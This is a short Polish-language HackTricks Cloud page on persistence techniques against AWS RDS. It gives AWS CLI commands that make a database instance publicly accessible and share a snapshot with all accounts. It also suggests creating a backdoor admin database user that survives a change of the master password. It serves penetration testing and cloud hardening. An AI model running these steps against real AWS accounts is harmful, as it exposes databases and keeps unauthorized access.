Files
hacktricks-cloud/src/pentesting-cloud/aws-security/aws-persistence/aws-rds-persistence/README.md
T

935 B

AWS - RDS Utrzymanie dostępu

{{#include ../../../../banners/hacktricks-training.md}}

RDS

Więcej informacji:

{{#ref}} ../../aws-services/aws-relational-database-rds-enum.md {{#endref}}

Uczynienie instancji publicznie dostępną: rds:ModifyDBInstance

Atakujący z tym uprawnieniem może zmodyfikować istniejącą instancję RDS, aby włączyć dostęp publiczny.

aws rds modify-db-instance --db-instance-identifier target-instance --publicly-accessible --apply-immediately

Utwórz użytkownika admina w DB

Atakujący może po prostu utworzyć użytkownika w DB, dzięki czemu nawet jeśli hasło konta master zostanie zmienione, nie straci dostępu do bazy danych.

Uczyń snapshot publicznym

aws rds modify-db-snapshot-attribute --db-snapshot-identifier <snapshot-name> --attribute-name restore --values-to-add all

{{#include ../../../../banners/hacktricks-training.md}}